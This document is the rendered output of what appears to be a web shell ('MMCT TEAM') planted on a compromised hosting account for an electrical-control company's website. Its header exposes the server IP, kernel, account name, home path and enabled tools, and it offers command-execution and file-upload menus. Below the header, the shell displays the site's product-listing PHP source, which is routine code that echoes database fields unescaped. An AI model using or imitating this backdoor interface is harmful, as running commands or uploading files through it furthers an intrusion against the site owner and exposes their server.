MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.142.98.60
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/arelectricalcontrol.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/arelectricalcontrol.com/product-lisiting.php
<!doctype html>
<html class="no-js" lang="zxx">

<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Our Products</title>
    <?php include "top-links.php";?>

</head>

<body class="home-electrician">
    
    <?php include "header.php";?>
    
    <div class="breadcumb-wrapper" data-bg-src="assets/img/bg/breadcumb-bg.jpg">
        <div class="container">
            <div class="breadcumb-content">
                <h1 class="breadcumb-title">Our Products</h1>
                <ul class="breadcumb-menu">
                    <li><a href="<?php echo $wspath?>">Home</a></li>
                    <li>Our Products</li>
                </ul>
            </div>
        </div>
    </div>
    
    <section class="space-top space-extra-bottom">
        <div class="container">
            
            <div class="row">
                <?php
                    $sqlprod = "SELECT * FROM `tbl_services` WHERE `tour_status`='Active' ORDER BY tour_order ASC";
                    $runprod = mysqli_query($db,$sqlprod) or die("Query Not run");
                    while($dataprod = mysqli_fetch_assoc($runprod)){
                ?>  
                <div class="col-lg-4">
                    <div class="project-card">
                        <div class="box-img">
                            <img src="<?=$wspath?>admin/images/property-image/<?=$dataprod['image'];?>" alt="<?=$dataprod['name'];?>" title="<?=$dataprod['name'];?>">
                        </div>
                        <div class="box-content">
                            <h5 class="box-title"><a href="<?php echo $wspath ?>product<?php echo $dataprod['slug_url'];?>.html"><?=$dataprod['name'];?></a></h5>
                            <a href="<?php echo $wspath ?>product<?php echo $dataprod['slug_url'];?>.html" class="icon-btn"><i class="far fa-arrow-right"></i></a>
                        </div>
                    </div>
                </div>
                <?php } ?>
            </div>
        </div>
    </section>
    <?php include "footer.php";?>  
    
</body>

</html>

MMCT - 2023